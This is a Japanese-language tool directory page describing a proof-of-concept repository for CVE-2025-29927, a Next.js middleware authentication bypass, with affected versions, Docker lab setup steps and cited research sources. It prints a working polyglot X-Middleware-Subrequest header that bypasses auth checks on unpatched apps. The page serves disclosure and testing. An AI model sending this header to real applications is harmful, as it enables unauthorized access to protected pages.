Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-29927-PoC — CVE-2025-29927 の PoC: Next.js ミドルウェアバイパスの脆弱性。x-middleware-subrequest が認証チェックをバイパスできる仕組みを示します。テスト用の Docker セットアップが含まれています。 | Kitploit
ツール/GitHubGitHub/alihussainzada/cve-2025-29927-poc
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubalihussainzada/cve-2025-29927-poc

CVE-2025-29927-PoC

CVE-2025-29927 の PoC: Next.js ミドルウェアバイパスの脆弱性。x-middleware-subrequest が認証チェックをバイパスできる仕組みを示します。テスト用の Docker セットアップが含まれています。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
5131年前未レビュー

CVE-2025-29927: Next.js ミドルウェアバイパス脆弱性 PoC

このリポジトリは、Next.js の CVE-2025-29927 脆弱性を実証するものです。この脆弱性では、内部ヘッダー x-middleware-subrequest を使用して、認証などのミドルウェアチェックをバイパスできます。

影響を受けるバージョン

  • Next.js 15.x < 15.2.3
  • Next.js 14.x < 14.2.25
  • Next.js 13.x < 13.5.9

再現手順

1. リポジトリをクローンする:

root@kitploit:~
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git

2. プロジェクトフォルダに移動する:

root@kitploit:~
cd CVE-2025-29927-PoC

3. シークレットを生成する:

root@kitploit:~
openssl rand -base64 32

4. .env ファイルのシークレットを更新する:

root@kitploit:~
NEXTAUTH_SECRET=your_generated_secret

5. Docker でビルドして実行する:

root@kitploit:~
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs

概念実証

この問題の悪用は、さまざまな可能性のあるケースを効果的にカバーできるポリグロットを使用することで、大幅に簡素化できます。これは、認証バイパスの存在を確認するために使用される以下の HTTP ヘッダーで実現できました:

root@kitploit:~
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

ユーザーをリダイレクト

悪用の例

クレジット/情報源

  • CVE-2025-29927 に関する Next.js ブログ
  • Zhero Web Security Research: Next.js と破損したミドルウェア
  • Assetnote Security Research: Next.js ミドルウェアバイパスの分析
ツールをダウンロード